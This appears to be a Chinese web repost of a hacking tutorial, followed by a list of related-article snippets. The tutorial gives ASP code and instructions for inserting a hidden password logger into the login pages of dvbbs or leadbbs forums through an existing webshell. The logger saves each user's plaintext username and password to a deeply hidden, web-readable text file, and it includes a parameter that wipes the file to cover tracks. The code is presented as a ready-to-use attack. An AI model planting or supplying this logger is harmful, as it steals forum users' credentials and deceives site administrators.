用asp记录论坛用户密码(dvbbs,leadbbs等)

很多人在得到动网的数据库后郁闷不已 (呀的,管理员的变态密码让我们的机器跑砸了都没辙)

Now We Have Another Method!!!!!  这就是用asp记录明文密码。

用法:1.将此代码插入login.asp或admin_login.asp等等验证登陆的文件末尾即可。

2.将PATH换成web下可访问的路径,如:C:\Inetpub\wwwroot\...\Info.txt(info.txt的路径越深越好,防止admin发现)

3.你的webshell必须有权限修改文件且FileSystemObject可用。

4.一段时间后在IE上访问:http://.../Info.txt就 可以看到登录过的用户的帐号密码。

5.在IE上输http://.../(which your modified).asp?u=del可一清楚info.txt的内容。

注意:1.你可以为它添加其他功能,例如:已记录的用户不再重复记录,用邮件接收密码等等。

2.为了防止info.txt过大,我用清空info.txt的方法。

当然你可以新建文件来解决此问题。

if filesize>200000 then

set file2=fso.OpenTextFile(PATH,2,True)

file2.WriteLine ""

file2.close

end if

--------------------------------------------------------------------

<%

dim fso

dim file

dim file2

dim filesize

dim file3

set fso=server.createobject("Scripting.FileSystemObject")

If Request("u")="del" Then

set file=fso.OpenTextFile(PATH,2,True)

file.WriteLine ""

End If

If fso.FileExists("PATH") Then

set file=fso.OpenTextFile(PATH,8,True)

Else

set file=fso.CreateTextFile(PATH)

end if

file.WriteLine "Username:"+Request.form("Username")

file.WriteLine "Password:"+Request.form("password")

file.close

set file3=fso.GetFile(PATH)

filesize=file3.size

if filesize>200000 then

set file2=fso.OpenTextFile(PATH,2,True)

file2.WriteLine ""

file2.close

end if

set file=nothing

set file2=nothing

set filesize=nothing

set fso=nothing

%>

----------------------------------------------------------------------

By ymqsz

E-mail:ymqsz@tom.com

(0)

相关推荐

  • 用asp记录论坛用户密码(dvbbs,leadbbs等)

    很多人在得到动网的数据库后郁闷不已 (呀的,管理员的变态密码让我们的机器跑砸了都没辙) Now We Have Another Method!!!!!  这就是用asp记录明文密码. 用法:1.将此代码插入login.asp或admin_login.asp等等验证登陆的文件末尾即可. 2.将PATH换成web下可访问的路径,如:C:\Inetpub\wwwroot\...\Info.txt(info.txt的路径越深越好,防止admin发现) 3.你的webshell必须有权限修改文件且File

  • 使用ASP记录在线用户的数量的代码

    网络的访问量是每一个做网站的网友们都非常关心的问题.如何得知有多少个人正在访问你的网站呢?如何将每天的访问量记录下来? 下面就是一个解决方案.  当有用户开始访问网站时,服务器端的Global.asa将会被访问.将会给用户开启一个Session.可以给每一个用户设置自己的个人用户信息.这里就不多进行解释了.在Global.asa中有当Application启动和Session启动时的消息响应函数.可以敲入如下的代码. 复制代码 代码如下: < SCRIPT LANGUAGE="VBScri

  • 用ASP实现MSSQL用户密码破解

    自己把以下代码保存为ASP文件.当然我还是一如既往的BS那些只改作者名字的家伙. 复制代码 代码如下: <%  '============ ASP Port Scanner by lake2 ===================  'http://lake2.0x54.org  'Version: 0.1  'For SpringBoard  '==========================================================  %>  <style 

  • Asp中随机产生用户密码的代码

    随机产生用户密码(good),说明:通过随机产生密码,然后将密码EMail给注册用户,你可以确认用户的EMail填写是否正确.  说明:通过随机产生密码,然后将密码EMail给注册用户,你可以确认用户的EMail填写是否正确.自动产生的密码往往安全性更高,同时,你可以过滤那些无效的用户.    把下面的代码保存为random.asp文件:  复制代码 代码如下: <%   Sub StrRandomize(strSeed)   Dim i, nSeed    nSeed = CLng(0)  

  • asp.net利用cookie保存用户密码实现自动登录的方法

    本文实例讲述了asp.net利用cookie保存用户密码实现自动登录的方法.分享给大家供大家参考.具体分析如下: 在asp.net中可以用cookie保存用户的帐户密码实现自动登录的功能,但是需要强调一下,cookie在客户端保存,是不安全的,推荐使用md5加密保存. 下面分析一下在asp.net中cookie的创建.提取与销毁的方法: 创建cookie 复制代码 代码如下: //向客户端写入Cookie HttpCookie hcUserName1 = new HttpCookie("unam

  • Discuz!NT 论坛整合ASP程序论坛教程

    复制代码 代码如下: 登陆时记录cookies页面代码 <!--#include file="md5.asp"--> //32位md5加密文件,一定得调用,该文件到处有,我就不提供了 <% dim Username,Password,Question,Answer,Expires,Verify Username=replace(trim(Request.form("Username")),"'","''")

  • DISCUZ 论坛管理员密码忘记的解决方法

    DISCUZ论坛管理员密码忘记了怎么办? 今天,一个朋友在QQ上问我,"如果DISCUZ论坛管理员密码忘记了 从MYSQL 哪里找啊?", 他用的是HostMonster的虚拟主机. yun~~~, 自己也没用过DISCUZ,只好说,"这个不是很清楚,可以直接去改一下数据库的记录试一下, 但是不知道DISCUZ是否对密码加密了 " 后来他登录cPanel,用phpMyAdmin进去查看, 又晕了,一堆表不知道是哪个,在google一下查到了"Discuz

  • php用户密码加密算法分析【Discuz加密算法】

    本文实例讲述了php用户密码加密算法.分享给大家供大家参考,具体如下: 今天在拿Discuz进行二次开发时需要在代码里验证Discuz的用户名密码,结果不小心掉进了坑里,因为Discuz的论坛有两张表来存储用户数据,一张在Discuz的数据库ultrax里面的pre_common_member里面,另一个是存储在了UCenter的数据库ucenter的uc_members表里.花了很大功夫在研究ultrax库里那张pre_common_member的数据,研究它的密码是如何生成的,结果搜了一下发

  • SQLSERVER记录登录用户的登录时间(自写脚本)

    前一阵子经理问我能不能把用户最后一次登录我们的业务数据库的时间记录下来,因为之前有人修改过数据库sa用户的登录密码,所以我们要记录一下. 我查了一下资料,好像不能记录谁登录过业务库,只能记录谁登录过SQLSERVER 数据库版本是SQL2005 ,操作系统:Windows7 下面是本人写的一个脚本,我的实现原理是使用触发器,触发器是登录触发器,范围是整个服务器范围,如果有人登录过,就使用 bcp命令把登录信息记录日志文件 1.如果原来数据库已经存在触发器把他删掉 复制代码 代码如下: USE M

  • 使用mongoose和bcrypt实现用户密码加密的示例

    前面的话 最近在做的个人项目中,需要对密码进行加密保存,对该操作的详细步骤记录如下 介绍 关于mongoose已经写过博客就不再赘述,下面主要介绍bcrypt bcrypt是一个由两个外国人根据Blowfish加密算法所设计的密码散列函数.实现中bcrypt会使用一个加盐的流程以防御彩虹表攻击,同时bcrypt还是适应性函数,它可以借由增加迭代之次数来抵御暴力破解法 使用npm安装即可 npm install --save bcrypt 用户模型 下面来创建代码用户user的schema,用户名

随机推荐